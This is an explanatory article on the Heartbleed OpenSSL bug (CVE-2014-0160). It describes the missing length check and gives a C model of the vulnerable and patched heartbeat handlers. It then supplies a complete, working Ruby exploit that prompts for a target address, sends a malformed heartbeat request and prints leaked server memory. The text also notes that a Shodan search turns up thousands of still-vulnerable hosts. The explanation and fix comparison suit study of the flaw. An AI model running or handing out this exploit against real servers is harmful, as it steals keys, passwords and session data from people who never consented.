Heartbleed

Heartbeat is a TLS/DTLS extension implemented by the OpenSSL library. OpenSSL is an open source project implementing Transport Layer Security and Secure Sockets Layer (SSL/TLS) as well as DTLS. The Heartbeat extension, specified in RFC 6520, was introduced to check whether a TLS connection is still alive without renegotiating it. It is a very simple mechanism: the client sends a special message called a heartbeat request to the server. This message carries a payload and a 16-bit length field stating how big that payload is. In response, the server sends back a heartbeat response containing a copy of the same payload with the same declared length. (The roles can also be reversed: a malicious server can send requests to a vulnerable client.)

However, the OpenSSL developers made a mistake: the implementation never checked whether the length stated in the heartbeat message matched the amount of payload data that actually arrived. In the original Heartbeat implementation the client could declare any payload length, up to 65535 bytes, and the server would take it at face value. The problem shows when the declared length exceeds the real payload: the server copies the declared number of bytes starting at the payload, so the response also contains whatever happened to sit next to it in the server's memory:

[->] Client request: 1 byte of real data, declared size: 200 bytes.
[<-] Server response: 200 bytes of data (1 original byte + 199 bytes from adjacent memory), size: 200 bytes.

A more accurate description of this buffer over-read vulnerability can be found here.

After so many years there are still people running old versions of OpenSSL! Vulnerable versions are OpenSSL 1.0.1 through 1.0.1f; the missing length check was added in 1.0.1g. Knowing this, a simple Shodan search can turn up thousands of vulnerable hosts.
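To make the missing check concrete, here is an added example (not OpenSSL's own source): a cut-down C model of the server side of OpenSSL's heartbeat handler, once in the shape that shipped in 1.0.1 through 1.0.1f and once with the two bounds checks that 1.0.1g added. The struct record type, the arena, the secret string and the demo lengths are this example's own assumptions; only the form of the checks and of the echoed response follows the real handler.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not OpenSSL's own source: a cut-down model of the server side of
 * tls1_process_heartbeat() from OpenSSL 1.0.1, first as shipped in 1.0.1-1.0.1f and
 * then with the bounds checks 1.0.1g added. struct record stands in for the
 * rrec.data / rrec.length fields of OpenSSL's record layer; the arena and the
 * secret below are constructed demo data. */

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16                    /* minimum padding, RFC 6520 section 4 */
#define HB_MAX_RESPONSE  (3 + 65535 + HB_PADDING)

struct record {
    const unsigned char *data;                 /* decrypted record plaintext */
    size_t length;                             /* bytes that actually arrived */
};

/* Big-endian uint16 from the wire, like OpenSSL's n2s() macro. */
static unsigned int n2s(const unsigned char *p) {
    return ((unsigned int)p[0] << 8) | p[1];
}

/* Build the HeartbeatResponse: type, echoed length, 'payload' bytes copied from pl. */
static size_t build_response(unsigned char *out, const unsigned char *pl, unsigned int payload) {
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (unsigned char)(payload >> 8);
    out[2] = (unsigned char)payload;
    memcpy(out + 3, pl, payload);              /* copies whatever follows pl, record or not */
    memset(out + 3 + payload, 0, HB_PADDING);
    return 3 + payload + HB_PADDING;
}

/* Vulnerable: the memcpy length is the one the peer wrote into the message;
 * rec->length is never consulted, so the copy runs past the record's end. */
size_t heartbeat_vulnerable(const struct record *rec, unsigned char *out) {
    const unsigned char *p = rec->data;
    unsigned char hbtype = *p++;
    unsigned int payload = n2s(p);
    p += 2;
    if (hbtype != TLS1_HB_REQUEST) return 0;
    return build_response(out, p, payload);
}

/* Fixed (1.0.1g): silently discard unless header, declared payload and padding
 * all fit inside the record that was actually received. */
size_t heartbeat_fixed(const struct record *rec, unsigned char *out) {
    const unsigned char *p = rec->data;
    unsigned char hbtype;
    unsigned int payload;
    if (1 + 2 + HB_PADDING > rec->length) return 0;
    hbtype = *p++;
    payload = n2s(p);
    p += 2;
    if (1 + 2 + payload + HB_PADDING > rec->length) return 0;   /* the check Heartbleed lacked */
    if (hbtype != TLS1_HB_REQUEST) return 0;
    return build_response(out, p, payload);
}

/* Constructed demo memory: a 21-byte request (type, declared length, 2-byte payload
 * "hi", 16 bytes of padding) at the start of a 128-byte arena, followed by bytes that
 * play the role of adjacent heap contents. Keep 'declared' <= 125 so the vulnerable
 * copy stays inside the arena; real OpenSSL read up to 64 KiB past the record. */
static unsigned char arena[128];
static const char secret[] = "SESSIONID=0xdeadbeef;password=hunter2";

static struct record build_demo(unsigned int declared) {
    struct record rec = { arena, 21 };
    memset(arena, 0, sizeof arena);
    arena[0] = TLS1_HB_REQUEST;
    arena[1] = (unsigned char)(declared >> 8);
    arena[2] = (unsigned char)declared;
    arena[3] = 'h'; arena[4] = 'i';
    memset(arena + 5, 0xAA, HB_PADDING);
    memcpy(arena + 21, secret, sizeof secret - 1);
    return rec;
}

/* Response length for a request declaring 'declared' payload bytes; 0 means discarded. */
size_t demo_response_len(int fixed, unsigned int declared) {
    static unsigned char out[HB_MAX_RESPONSE];
    struct record rec = build_demo(declared);
    return fixed ? heartbeat_fixed(&rec, out) : heartbeat_vulnerable(&rec, out);
}

/* 1 if the response echoes the 'adjacent' secret, i.e. the over-read happened. */
int demo_secret_leaked(int fixed, unsigned int declared) {
    static unsigned char out[HB_MAX_RESPONSE];
    struct record rec = build_demo(declared);
    size_t n = fixed ? heartbeat_fixed(&rec, out) : heartbeat_vulnerable(&rec, out);
    size_t off = 3 + 2 + HB_PADDING;           /* where arena[21] lands in the response */
    return n >= off + sizeof secret - 1 && memcmp(out + off, secret, sizeof secret - 1) == 0;
}

int main(void) {
    printf("vulnerable, declared 64: %zu bytes back, secret leaked: %d\n",
           demo_response_len(0, 64), demo_secret_leaked(0, 64));
    printf("fixed, declared 64:      %zu bytes back (silently discarded)\n", demo_response_len(1, 64));
    printf("fixed, declared 2:       %zu bytes back (legitimate echo)\n", demo_response_len(1, 2));
    return 0;
}
```

Two details of the fix are worth noticing. The record must be long enough to hold not only the declared payload but also 16 bytes of padding, because RFC 6520 requires every heartbeat message to carry at least that much; a request shorter than that is not a valid heartbeat at all. And an oversized request is dropped silently rather than answered with an alert, which is why a patched server simply never replies to the exploit's request.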
Here's the Ruby exploit code. The original version read the server's handshake with a single recv() and printed whatever the next recv() returned, so leftover certificate bytes showed up in the "memory dump" and most of the 64 KiB response was never read; this version walks the TLS records properly, times out against patched servers (which silently discard the request) and prints only printable ASCII:
require 'socket'

puts <<~BANNER
  CVE-2014-0160
  OpenSSL 'Heartbleed' buffer over-read exploit
  By Komodo
BANNER

# Read one TLS record; returns [content_type, body], or nil once the server has closed.
def read_record(sock)
  hdr = sock.read(5) or return nil
  type, _version, len = hdr.unpack('Cnn')
  [type, sock.read(len)]
end

def main(address)
  # TLS 1.1 ClientHello: 32-byte random, TLS_RSA_WITH_AES_128_CBC_SHA, renegotiation_info ext.
  hello = "\x16\x03\x02\x00\x34\x01\x00\x00\x30\x03\x02".b + Random.new.bytes(32) +
          "\x00\x00\x02\x00\x2f\x01\x00\x00\x05\xff\x01\x00\x01\x00".b
  # Heartbeat request (type 1) declaring a 0xffff-byte payload while carrying none.
  payload = "\x18\x03\x02\x00\x03\x01\xff\xff".b
  print 'Port (press enter for default 443): '
  port = gets.chomp
  s = TCPSocket.new(address, port.empty? ? 443 : port.to_i)
  s.write(hello)
  # Drain the handshake up to ServerHelloDone (0e 00 00 00 ends its record), so certificate bytes aren't taken for leaked memory.
  loop do
    rec = read_record(s) or raise 'connection closed during handshake'
    type, body = rec
    raise 'server answered the ClientHello with an alert' if type == 21
    break if type == 22 && body.end_with?("\x0e\x00\x00\x00".b)
  end
  s.write(payload)
  # A vulnerable server sends ~64 KiB over several heartbeat records (type 24); a patched one silently discards the request, hence the select() timeout.
  data = ''.b
  loop do
    IO.select([s], nil, nil, 5) or break
    rec = read_record(s) or break
    type, body = rec
    break if type == 21
    data << body if type == 24
    break if data.bytesize >= 3 && data.bytesize >= 3 + data[1, 2].unpack1('n')
  end
  raise "no heartbeat response, #{address} does not look vulnerable" if data.bytesize < 3
  # Drop the 3-byte heartbeat header; keep printable ASCII, dot out everything else.
  "\n#{address} Memory dump (#{data.bytesize - 3} bytes):\n\n#{data[3..-1].gsub(/[^ -~\n]/n, '.')}\n"
end

begin
  print 'Address/domain: '
  puts main(gets.chomp)
rescue => e
  abort("\nError: #{e}\n\n")
end